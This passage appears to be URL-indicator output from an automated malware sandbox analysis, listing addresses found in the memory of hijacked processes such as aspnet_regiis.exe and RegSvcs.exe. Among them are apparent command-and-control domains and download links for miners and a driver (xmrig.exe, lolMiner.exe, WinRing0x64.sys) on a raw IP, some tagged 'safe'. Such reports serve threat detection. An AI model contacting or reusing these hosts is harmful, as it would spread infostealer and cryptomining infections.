                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700aspnet_regiis.exe, 00000007.00000003.1648458748.00000000056A7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1619768349.0000000002934000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://147.45.47.81/3aspnet_regiis.exe, 00000008.00000003.1760970169.0000000002912000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://relalingj.sbs/aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://tamedgeesy.sbs/apiYaspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1463623078.0000000002E44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackaspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506903568.0000000002907000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://nuget.org/nuget.exepowershell.exe, 00000024.00000002.1940781262.00000000062E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://s.ytimg.com;aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&ctaaspnet_regiis.exe, 00000008.00000003.1619768349.0000000002934000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000021.00000002.1979634479.000000000241E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1936687043.0000000005281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#aspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmp, MPDIZKEMMIDUY52JFU3.exe.8.dr, OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe.7.drfalse
                                                                                            high
                                                                                            https://steambroadcastchat.akamaizaspnet_regiis.exe, 00000008.00000003.1499115102.00000000028D5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000024.00000002.1936687043.00000000053D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000024.00000002.1936687043.00000000053D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://marshal-zhukov.caspnet_regiis.exe, 00000007.00000003.1721547580.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1721867399.0000000002E6B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1685994655.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1692490645.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499365497.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://contoso.com/Iconpowershell.exe, 00000024.00000002.1940781262.00000000062E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000007.00000003.1527742549.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527594236.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527538113.00000000056D9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530696295.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530776649.0000000004D96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530957968.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000007.00000003.1646545677.00000000056CF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618174910.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&amp;aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000007.00000003.1527742549.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527594236.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527538113.00000000056D9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530696295.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530776649.0000000004D96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530957968.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://lv.queniujq.cnaspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.youtube.com/aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000024.00000002.1936687043.00000000053D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.cloudflare.com/5xx-error-landingRegSvcs.exe, 00000021.00000002.1979634479.0000000002454000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000021.00000002.1979634479.000000000244F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngaspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://147.45.47.81/taspnet_regiis.exe, 00000008.00000003.1760970169.0000000002912000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zaspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmp, MPDIZKEMMIDUY52JFU3.exe.8.dr, OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe.7.drfalse
                                                                                                                              high
                                                                                                                              http://147.45.47.81/maspnet_regiis.exe, 00000008.00000003.1760970169.0000000002912000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000024.00000002.1936687043.00000000053D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.google.com/recaptcha/aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://checkout.steampowered.com/aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28baspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1508014312.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1507674483.0000000002903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngaspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://147.45.47.81/35aspnet_regiis.exe, 00000007.00000002.1804352818.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://pastebin.comRegSvcs.exe, 00000021.00000002.1979634479.0000000002433000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&amp;l=engliaspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://marshal-zhukov.com/apizaspnet_regiis.exe, 00000007.00000003.1721547580.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1721867399.0000000002E6B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1685994655.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1692490645.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804443688.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            https://marshal-zhukov.com/apionaspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804443688.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            http://147.45.47.81/WatchDog.exeAhttp://147.45.47.81/lolMiner.exe;http://147.45.47.81/xmrig.exeInstaller.exe, 0000001F.00000003.1911606437.0000000003B22000.00000040.00001000.00020000.00000000.sdmp, Installer.exe, 0000001F.00000002.1911910899.000000000038C000.00000004.00000001.01000000.0000000A.sdmp, RegSvcs.exe, 00000021.00000002.1975416877.0000000000162000.00000020.00000400.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://ocsp.sectigo.com0aspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmp, MPDIZKEMMIDUY52JFU3.exe.8.dr, Installer.exe.29.dr, OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe.7.drfalse
                                                                                                                                              high
                                                                                                                                              https://rottieud.sbs/apibsaspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              unknown
                                                                                                                                              https://help.steampowered.com/en/aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://tamedgeesy.sbs/haspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                unknown
                                                                                                                                                http://joxi.net/4Ak49WQH0GE3Nr.mp3licInstaller.exe, 0000001F.00000002.1912432871.0000000001502000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://marshal-zhukov.com/apigaspnet_regiis.exe, 00000007.00000003.1526820402.0000000002E97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://marshal-zhukov.com/apimaspnet_regiis.exe, 00000007.00000003.1692490645.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1799258443.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804574864.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1799857013.0000000002ECC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=aspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1508014312.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1507674483.0000000002903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://147.45.47.81/WinRing0x64.sysPRegSvcs.exe, 00000021.00000002.1979634479.0000000002498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://recaptcha.net/recaptcha/;aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://tamedgeesy.sbs/aaspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      unknown
                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&amp;l=englisaspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://broadcast.st.dl.eccdnx.comaspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifaspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vaspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C129b19db70bc2b7aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1507136747.000000000294B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://x1.c.lencr.org/0aspnet_regiis.exe, 00000007.00000003.1646545677.00000000056CF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618174910.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://x1.i.lencr.org/0aspnet_regiis.exe, 00000007.00000003.1646545677.00000000056CF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618174910.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
